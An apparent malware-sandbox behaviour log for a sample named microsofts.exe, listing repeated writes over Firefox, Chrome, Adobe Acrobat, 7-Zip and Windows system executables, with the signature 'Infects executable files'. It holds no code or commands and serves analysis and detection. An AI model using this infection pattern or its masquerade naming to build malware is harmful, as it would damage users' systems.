                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
